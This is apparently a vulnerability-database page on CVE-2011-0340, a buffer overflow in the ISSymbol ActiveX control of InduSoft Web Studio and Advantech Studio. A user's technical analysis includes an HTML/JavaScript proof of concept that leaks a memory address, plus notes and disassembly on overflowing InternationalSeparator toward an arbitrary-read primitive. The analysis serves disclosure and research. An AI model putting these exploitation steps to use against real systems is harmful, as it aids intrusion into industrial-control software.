Attacker Value
Unknown
(1 user assessed)
Exploitability
Unknown
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
0

InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow

Disclosure Date: May 04, 2011
CVE-2011-0340
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Multiple buffer overflows in the ISSymbol ActiveX control in ISSymbol.ocx 61.6.0.0 and 301.1009.2904.0 in the ISSymbol virtual machine, as distributed in Advantech Studio 6.1 SP6 61.6.01.05, InduSoft Web Studio before 7.0+SP1, and InduSoft Thin Client 7.0, allow remote attackers to execute arbitrary code via a long (1) InternationalOrder, (2) InternationalSeparator, or (3) LogFileName property value; or (4) a long bstrFileName argument to the OpenScreen method.

Add Assessment

1
Technical Analysis

Info Leak Through ForceRemoteBehavior

The ForceRemoteBehavior getter, when using an “unitialized” issymbol
object allows to disclose address from issymbol. Issymbol isn’t aslr
compatible, but could rebase. Anyway, issymbol doesn’t contain pointers
to interesting API’s for ASLR bypass, so even when it would be easy
to use the issymbol.dll it won’t be usefull because of this.

<html>
<body>
<object classid='clsid:3c9dff6f-5cb0-422e-9978-d6405d10718f' id='test'></object>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script language='javascript'>
alert(test.ForceRemoteBehavior);
</script>
</body>
</html>

Info Leak through StartupColumnTranslate

Overflowing the vulnerable InternationalSeparator() method with 212 bytes
allows to reach the pointer to the StartupColumnTranslate property (string).

By overflowing this pointer should be possible to retrieve arbitrary data
from the memory map by using the StartupColumnTranslate getter:

.text:1000EF40 StartupColumnTranslate_sub_1000EF40 proc near ; DATA XREF: .rdata:101DCE98o
.text:1000EF40
.text:1000EF40 var_10          = byte ptr -10h
.text:1000EF40 var_C           = dword ptr -0Ch
.text:1000EF40 var_4           = dword ptr -4
.text:1000EF40
.text:1000EF40                 push    0FFFFFFFFh
.text:1000EF42                 push    offset sub_101B7579
.text:1000EF47                 mov     eax, large fs:0
.text:1000EF4D                 push    eax
.text:1000EF4E                 push    ecx
.text:1000EF4F                 push    esi
.text:1000EF50                 mov     eax, ___security_cookie
.text:1000EF55                 xor     eax, esp
.text:1000EF57                 push    eax
.text:1000EF58                 lea     eax, [esp+18h+var_C]
.text:1000EF5C                 mov     large fs:0, eax
.text:1000EF62                 add     ecx, 2540h ; ecx + 2540h => pointer to StartupColumnTranslate property
.text:1000EF68                 push    ecx
.text:1000EF69                 lea     ecx, [esp+1Ch+var_10]
.text:1000EF6D                 call    ds:??0?$CStringT@_WV?$StrTraitMFC_DLL@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@QAE@ABV01@@Z ; ATL::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>(CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>> const &)
.text:1000EF73                 lea     ecx, [esp+18h+var_10]
.text:1000EF77                 mov     [esp+18h+var_4], 0
.text:1000EF7F                 call    ds:?AllocSysString@?$CStringT@_WV?$StrTraitMFC_DLL@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@QBEPA_WXZ ; ATL::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>::AllocSysString(void)
.text:1000EF85                 lea     ecx, [esp+18h+var_10] ; void *
.text:1000EF89                 mov     esi, eax
.text:1000EF8B                 call    ds:__imp_??1?$CStringT@_WV?$StrTraitMFC_DLL@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@QAE@XZ ; ATL::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>::~CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>(void)
.text:1000EF91                 mov     eax, esi
.text:1000EF93                 mov     ecx, [esp+18h+var_C]
.text:1000EF97                 mov     large fs:0, ecx
.text:1000EF9E                 pop     ecx
.text:1000EF9F                 pop     esi
.text:1000EFA0                 add     esp, 10h
.text:1000EFA3                 retn
.text:1000EFA3 StartupColumnTranslate_sub_1000EF40 endp

PROBLEM: It’s using the Microsoft Foundation Classes, and create fake
strings memory objects in memory isn’t so easy! We should dig in to that,
should be possible with more work!

Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
None
Impact Score:
Unknown
Exploitability Score:
Unknown
Vector:
Unknown
Attack Vector (AV):
Unknown
Attack Complexity (AC):
Unknown
Privileges Required (PR):
Unknown
User Interaction (UI):
Unknown
Scope (S):
Unknown
Confidentiality (C):
Unknown
Integrity (I):
Unknown
Availability (A):
Unknown

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
Unknown
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

  • advantech,
  • indusoft

Products

  • advantech studio 6.1,
  • thin client 7.0,
  • web studio,
  • web studio 6.1
Technical Analysis